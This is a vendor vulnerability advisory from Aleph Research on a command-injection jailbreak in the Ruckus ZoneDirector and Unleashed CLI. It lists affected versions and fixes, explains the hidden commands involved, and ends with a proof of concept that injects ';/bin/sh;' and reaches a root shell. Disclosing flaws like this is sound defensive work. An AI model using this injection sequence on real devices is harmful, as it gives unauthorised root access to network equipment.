Ruckus CLI (rkscli) jailbreak

Aleph Research Advisory

Identifier

ALEPH-2019014

Severity

Moderate

Product

ZoneDirector
Unleashed

Vulnerable Version

ZoneDirector: 9.9 and before
ZoneDirector: 9.10.x
ZoneDirector: 9.12.x
ZoneDirector: 9.13.x
ZoneDirector: 10.0.x
ZoneDirector: 10.1.x
ZoneDirector: 10.2.x
ZoneDirector: 10.3.x
Unleashed: 200.6 and before
Unleashed: 200.7

Mitigation

9.10.x: Upgrade to 9.10.2.0.84
9.12.x: Upgrade to 9.12.3.0.136
9.13.x: Upgrade to 10.0.1.0.90
10.0.x: Upgrade to 10.0.1.0.90
10.1.x: Upgrade to 10.1.2.0.275
10.2.x: Upgrade to 10.2.1.0.147
10.3.x: Upgrade to 10.3.1.0.21
200.6 and before: Upgrade to 200.7.10.202.94
200.7: Upgrade to 200.7.10.202.94

Technical Details

This is a command injection vulnerability via a crafted CLI command with admin privilege.

/usr/bin/rkscli is a CLI used by Ruckus for user interaction and run commands by their web interface. rkscli has a hidden CLI command Ruckus that writes a limited string to /writable/etc/system/access. !v54! is another hidden command. If !v54! do not receive any arguments it executes /usr/sbin/sesame with that content of /writable/etc/system/access.

Ruckus command can write a command injection payload into /writable/etc/system/access. Then !v54! can execute this payload and this way, escape to busybox shell.

Information about the exploitation of the vulnerability can be found in our 36C3 talk.

Proof Of Concept

Jail breaking Ruckus CLI using this exploit

rkscli: Ruckus <-input ";/bin/sh;"
grrrr

rkscli: !v54!
What's your chow: 


Ruckus Wireless ZoneDirector -- Command Line Interface
Enter 'help' for a list of built-in commands.

ruckus$ echo $USER
root